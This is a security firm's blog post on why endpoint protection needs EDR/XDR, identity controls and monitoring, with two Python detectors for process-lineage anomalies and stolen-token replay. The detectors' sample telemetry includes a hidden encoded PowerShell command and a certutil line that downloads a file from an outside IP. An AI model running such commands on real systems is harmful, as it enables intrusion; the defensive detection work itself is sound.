Techerino
Cybersecurity · May 11, 2026 · 9 min read

Endpoint Security in 2026 — Why Antivirus Alone Stopped Being Enough Years Ago

Signature-based AV catches yesterday's malware. The interesting attacks don't drop files anymore. A frank look at what actually protects a laptop in 2026 — and the shortlist of capabilities to demand.

The Techerino Team

Cybersecurity Practice

[Illustration: live endpoint telemetry dashboard contrasting signature-based AV with an EDR core; a mixed fleet of laptops, phones, servers, a kiosk and a BYOD device reads Healthy, one host reads ANOMALY · ISOLATED; caption: BEHAVIOR > SIGNATURES]

The most expensive incident we cleaned up in the last twelve months started on a fully patched laptop running a brand-name antivirus suite with a green checkmark in the dashboard. The endpoint did not detect anything because nothing “malicious” in the signature sense ever ran. The attacker logged in with stolen credentials, used the machine’s own tooling (PowerShell, scheduled tasks, the cloud sync agent) to move laterally, and exfiltrated data over the corporate VPN for nine days before anyone noticed.

This is not an unusual story. It is the median story. And it is the reason we now spend more time talking clients out of standalone AV renewals than we spend talking them into anything.

The shift attackers already made

Endpoint defense was originally a file problem. A bad executable landed on the disk, the AV engine matched it against a list of bad files, and the file was quarantined. That model worked beautifully from roughly 1995 to about 2015. It has been steadily losing for the decade since, and in 2026 it is operationally obsolete for one reason: attackers stopped dropping recognizable files.

The patterns we see across recent breaches:

  • Living off the land. The attacker uses built-in tools — PowerShell, certutil, rundll32, WMI, the M365 Graph API, the cloud agent that’s already trusted — to do everything from reconnaissance to staging to exfiltration. There is no “malware” to detect because no file is foreign.
  • Bring-your-own-vulnerable-driver (BYOVD). A signed driver from a legitimate but vulnerable vendor is loaded to disable security tooling at the kernel level. Your AV reports healthy right up until it doesn’t exist anymore.
  • Fileless and in-memory payloads. Code is reflected into the memory of a trusted process — your browser, your endpoint agent itself, your IDE — and never touches the disk. The signature engine has nothing to scan.
  • Credentials over code. Half of the “malware incidents” we’re asked to investigate turn out to be just-someone-logging-in with stolen credentials. There is no payload. There is a session token.

What signature antivirus misses

Signature AV is still worth running — it’s a low-cost, low-noise filter for the long tail of dumb commodity malware that somehow still circulates. The problem is that it has been quietly repositioned, by vendors and by the threat landscape, from “your defense” to “one cheap layer.” If your endpoint program is signature AV plus a Windows Defender checkbox, the parts of an attack you cannot see include:

  • Process lineage anomalies. Why is winword.exe spawning powershell.exe spawning certutil.exe at 3 AM? Your AV doesn’t know. Your EDR does.
  • Token theft and replay. A primary refresh token stolen from a laptop is reused from a residential IP in another country, an hour later, against the same M365 tenant. Pure identity story — no file involvement.
  • Suspicious script content via in-memory execution. AMSI-bypass techniques have been documented and packaged for years. AV engines that depend on AMSI for script visibility are blind to exactly the techniques built to defeat AMSI; an EDR that also records the script host's parent chain, command line and network connections still sees the behavior around the script, even when the script itself is hidden.
  • Lateral movement signals. SMB enumeration, named-pipe abuse, WMI remote execution, and PsExec-style operations look like normal administration until you correlate timing, source, and downstream behavior across multiple endpoints.
The honest framing. Antivirus stops what a 2010-era attacker did. EDR/XDR is what you need to see what a 2026-era attacker does. They are complementary; one does not replace the other, but you can no longer have only one.
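The lineage question above (why is winword.exe spawning powershell.exe spawning certutil.exe at 3 AM?) is exactly the kind of rule an EDR evaluates over process-start telemetry, and it also catches the living-off-the-land pattern from the earlier list. The following is an added example, not Techerino's tooling or any vendor's product: it walks a parent chain built from constructed process-creation events (the field names, the Office/script-host/LOLBin sets, and the 22:00-06:00 quiet window are all assumptions, modelled loosely on Sysmon Event ID 1 records) and flags processes whose ancestry, command line or timing is anomalous.

```python
"""Process-lineage anomaly detection over process-creation telemetry.

Added example, not Techerino's tooling or any vendor's product. The event
shape (pid, ppid, image, cmdline, ISO timestamp) is an assumption modelled
loosely on Sysmon Event ID 1 / EDR process-start records; the rule sets and
the off-hours window are illustrative and would be tuned per environment.
"""
from datetime import datetime

# Constructed sample telemetry for one host (not real data).
EVENTS = [
    {"pid": 400, "ppid": 1, "image": "explorer.exe", "ts": "2026-05-10T09:02:00"},
    {"pid": 1212, "ppid": 400, "image": "WINWORD.EXE", "ts": "2026-05-10T09:05:10"},
    # Office app spawning a hidden, encoded PowerShell at 3 AM
    {"pid": 1300, "ppid": 1212, "image": "powershell.exe", "ts": "2026-05-11T03:01:42",
     "cmdline": "powershell -nop -w hidden -enc SQBFAFgA"},
    # ...which then uses certutil as a downloader (living off the land)
    {"pid": 1344, "ppid": 1300, "image": "certutil.exe", "ts": "2026-05-11T03:01:50",
     "cmdline": "certutil -urlcache -split -f http://203.0.113.7/a.txt a.txt"},
    # Admin running PowerShell from the desktop at 2 PM: benign lineage
    {"pid": 2000, "ppid": 400, "image": "powershell.exe", "ts": "2026-05-10T14:20:00",
     "cmdline": "powershell Get-Service"},
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
LOLBINS = {"certutil.exe", "rundll32.exe", "regsvr32.exe", "bitsadmin.exe", "mshta.exe"}
HIDDEN_PS_FLAGS = (" -enc", " -e ", "-w hidden", "-windowstyle hidden")


def build_index(events):
    """Map pid -> event. Real telemetry should key on a process GUID rather
    than the pid, because pids are reused once a process exits."""
    return {e["pid"]: e for e in events}


def ancestry(by_pid, pid, max_depth=10):
    """Return the image names from `pid` up to the root, leaf first."""
    chain, seen, cur = [], set(), pid
    while cur in by_pid and cur not in seen and len(chain) < max_depth:
        seen.add(cur)
        chain.append(by_pid[cur]["image"].lower())
        cur = by_pid[cur]["ppid"]
    return chain


def off_hours(ts, start=22, end=6):
    """Assumed local-time quiet window (22:00-06:00); tune per site."""
    hour = datetime.fromisoformat(ts).hour
    return hour >= start or hour < end


def analyse(events):
    """Flag processes whose lineage, command line or timing is anomalous."""
    by_pid = build_index(events)
    findings = []
    for e in events:
        image = e["image"].lower()
        cmd = e.get("cmdline", "").lower()
        chain = ancestry(by_pid, e["pid"])
        reasons = []
        # Rule 1: a scripting host or LOLBin with an Office app anywhere above it
        if image in SCRIPT_HOSTS | LOLBINS and any(a in OFFICE for a in chain[1:]):
            reasons.append("office app in ancestry spawned scripting host / LOLBin")
        # Rule 2: certutil fetching from a URL is a downloader, not a cert tool
        if image == "certutil.exe" and "-urlcache" in cmd:
            reasons.append("certutil used as downloader")
        # Rule 3: hidden-window or encoded PowerShell command lines
        if image in {"powershell.exe", "pwsh.exe"} and any(f in cmd for f in HIDDEN_PS_FLAGS):
            reasons.append("hidden or encoded PowerShell")
        # Timing alone is not a finding; it raises the weight of a real one
        if reasons and off_hours(e["ts"]):
            reasons.append("off-hours execution")
        if reasons:
            findings.append({"pid": e["pid"], "chain": " <- ".join(chain), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyse(EVENTS):
        print(f"pid {f['pid']}: {f['chain']}")
        for r in f["reasons"]:
            print(f"    - {r}")
```

Run against the sample, the two 3 AM processes are flagged with their full chain back to explorer.exe, and the admin's daytime PowerShell is not. Nothing in these rules looks at a file hash: the signal lives entirely in the parent chain, the command line and the clock, which is why the same chain is invisible to a signature engine and obvious to an EDR.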

EDR, XDR, and what the acronyms actually buy you

The category names move around — EDR, EPP, XDR, MDR — and vendor marketing has done a thorough job of making them sound interchangeable. They are not. Stripped to function:

  • EPP (Endpoint Protection Platform). The modern antivirus tier. Signature + heuristic + lightweight behavior. Cheap, quiet, prevents commodity attacks. Run it.
  • EDR (Endpoint Detection & Response). Continuous behavioral telemetry — every process, every network connection, every script execution, every registry change — sent to a cloud analytics engine that flags anomalies in lineage, timing, and content. This is where you get the answer to “what happened on this machine yesterday at 2 AM?”
  • XDR (Extended Detection & Response). EDR data correlated with identity telemetry (M365, Okta, Google), email gateway events, network sensors, and cloud workload signals. The unit of investigation is no longer the endpoint — it’s the incident, regardless of where the breadcrumbs were dropped.
  • MDR (Managed Detection & Response). Humans on the other end, around the clock, watching the EDR/XDR consoles for you. Without an MDR (or an in-house SOC), EDR is just a tab in a browser nobody opens at 11 PM on a Friday.

Identity is half the endpoint story now

Almost every real-world endpoint compromise we’ve investigated in the last two years is, when you dig in, an identity compromise that happens to manifest on an endpoint. The boundary between the two has dissolved. Practically, that means a 2026 endpoint program also includes:

  • Conditional access tied to device posture — encryption on, EDR healthy, OS patched, no risky-IP geolocation mismatch — before any sign-in to M365, Google, or Okta succeeds.
  • Phish-resistant MFA (FIDO2 / passkeys) for, at minimum, executives, IT, finance, and anyone with administrative scope. Push prompts and one-time codes are phishable (an adversary-in-the-middle proxy relays the code; prompt bombing wears the user down) and are routinely phished.
  • Just-in-time admin elevation. Laptops should not have standing local-admin or domain-admin sessions. PIM, PAM, or even a thin home-rolled elevation flow is fine — anything but always-on privilege.
  • Token-binding-aware session policies. A refresh token stolen from a corporate laptop should be unusable from any other device. Several identity providers now offer this (Microsoft's Conditional Access token protection, which binds sign-in sessions to the registered device, is one example); most tenants haven’t enabled it.
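The replayed refresh token from the earlier section and the device-bound session policy above are two sides of one signal: prevention refuses a token from a device it was not issued to, detection notices when it was used anyway. The following is an added example, not Techerino's code and not any identity provider's log schema: it runs the detective version over constructed sign-in events. The `session_id` field is assumed to identify the refresh-token family a sign-in came from, `device_id` the registered device fingerprint, and the 60-minute country-change window is an illustrative stand-in for a proper geodistance-over-time check.

```python
"""Spotting replayed session tokens and impossible travel in sign-in telemetry.

Added example, not Techerino's code and not any identity provider's log
schema. Each record is a constructed, simplified sign-in event: `session_id`
is assumed to identify the refresh-token family the sign-in came from and
`device_id` the registered device fingerprint. The 60-minute window is an
illustrative stand-in for a proper geodistance-over-time check.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample sign-in events (not real data) from one tenant.
SIGNINS = [
    {"user": "cfo@example.com", "session_id": "sess-7a1", "device_id": "LAPTOP-04",
     "country": "NL", "ip": "198.51.100.23", "ts": "2026-05-10T08:55:00"},
    {"user": "dev@example.com", "session_id": "sess-9c0", "device_id": "MAC-09",
     "country": "NL", "ip": "198.51.100.41", "ts": "2026-05-10T09:10:00"},
    {"user": "cfo@example.com", "session_id": "sess-7a1", "device_id": "LAPTOP-04",
     "country": "NL", "ip": "198.51.100.23", "ts": "2026-05-10T09:40:00"},
    # Same refresh-token family, half an hour later, from an unregistered device
    # on a residential IP in another country: the stolen-token replay case
    {"user": "cfo@example.com", "session_id": "sess-7a1", "device_id": "unreg-3f9e",
     "country": "BR", "ip": "203.0.113.77", "ts": "2026-05-10T10:12:00"},
    {"user": "dev@example.com", "session_id": "sess-9c0", "device_id": "MAC-09",
     "country": "NL", "ip": "198.51.100.41", "ts": "2026-05-10T11:30:00"},
]

TRAVEL_WINDOW = timedelta(minutes=60)


def detect_token_replay(signins, window=TRAVEL_WINDOW):
    """Return one finding per suspicious sign-in, processing events in time order."""
    ordered = sorted(signins, key=lambda s: s["ts"])
    session_devices = defaultdict(set)  # session_id -> devices it has been used from
    last_by_user = {}                    # user -> most recent sign-in seen
    findings = []
    for s in ordered:
        ts = datetime.fromisoformat(s["ts"])
        reasons = []

        # Rule 1: a session (refresh-token family) appearing from a device it was
        # never issued to. With device-bound tokens enforced, this sign-in would
        # have failed outright; without them, it is the clearest replay signal.
        known = session_devices[s["session_id"]]
        if known and s["device_id"] not in known:
            reasons.append(f"session {s['session_id']} bound to {sorted(known)} "
                           f"now used from {s['device_id']}")
        known.add(s["device_id"])

        # Rule 2: country change faster than travel allows (coarse proxy)
        prev = last_by_user.get(s["user"])
        if prev and prev["country"] != s["country"] \
                and ts - datetime.fromisoformat(prev["ts"]) <= window:
            reasons.append(f"country {prev['country']} -> {s['country']} within {window}")
        last_by_user[s["user"]] = s

        if reasons:
            findings.append({"user": s["user"], "ts": s["ts"], "ip": s["ip"],
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in detect_token_replay(SIGNINS):
        print(f"{f['ts']} {f['user']} from {f['ip']}")
        for r in f["reasons"]:
            print(f"    - {r}")
```

Only the 10:12 sign-in is flagged, on both rules; the developer's repeated sign-ins from the same registered Mac produce nothing. This is pure identity telemetry, no endpoint file involved, which is the correlation an XDR is supposed to do for you and the reason the endpoint agent alone would have stayed green.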

A seven-line buying checklist

Whether you’re evaluating a renewal, an RFP, or a free trial, these seven questions filter out 90% of the inadequate tooling on the market. If the answer to any of them is hedged or unclear, keep looking.

  1. Does the agent capture and transmit full process lineage, not just blocked events? If you can’t investigate what the laptop did three days ago, you cannot do incident response.
  2. Is detection driven by behavior and ML in the cloud — not just signatures shipped to the agent? Local-only intelligence is yesterday’s intelligence.
  3. Does it isolate (network-quarantine) a host with one click? Containment time matters more than detection time. A 10-minute manual VLAN move during a live incident is unacceptable.
  4. Does it deliver telemetry to your SIEM/data lake in a format you can write queries against? Vendor lock-in on your own telemetry is a tax you pay forever.
  5. Are kernel-level protections in place against BYOVD and unsigned-driver loads? At minimum, Microsoft’s vulnerable driver blocklist actually enforced (through HVCI or a WDAC policy, not just recommended), plus tamper protection so the agent itself cannot be unloaded by a driver that slips through.
  6. Does it integrate with your identity provider for conditional access? Endpoint posture must be a signal your IdP can refuse to authenticate against.
  7. Is there a 24/7 human eyeballing the high-severity queue? Either inside your team or as part of an MDR contract. A console nobody watches is a license fee.

Three mistakes we still see in mid-market endpoint programs

  1. Buying the agent, skipping the operations. An EDR deployment without a documented response runbook, a named on-call, and quarterly drills is theater. The agent generates alerts; the alerts generate value only when something happens with them.
  2. Exclusions left in place from migration. “Temporary” performance-exclusion paths from the rollout three years ago are still in the policy. The most-targeted directories are usually the ones excluded for legacy app compatibility.
  3. Treating BYOD as an exception, not a class. Contractors, executives’ personal devices, the long tail of laptops that “don’t need” the corporate agent — this is where every recent compromise we’ve seen started. Either bring them under the program or block their access to tenant data with conditional access. There is no third option.

A modern endpoint program isn’t a single product. It’s the combination of a behavioral EDR/XDR, identity-aware conditional access, phish-resistant MFA, JIT privilege, and humans paying attention to the alerts. Most mid-market firms have three of those five. If you want a sober read on which ones you’re missing, we run a single-session endpoint assessment that produces a one-page gap list and a 90-day plan.


Tagged: Cybersecurity, Endpoint, EDR, Identity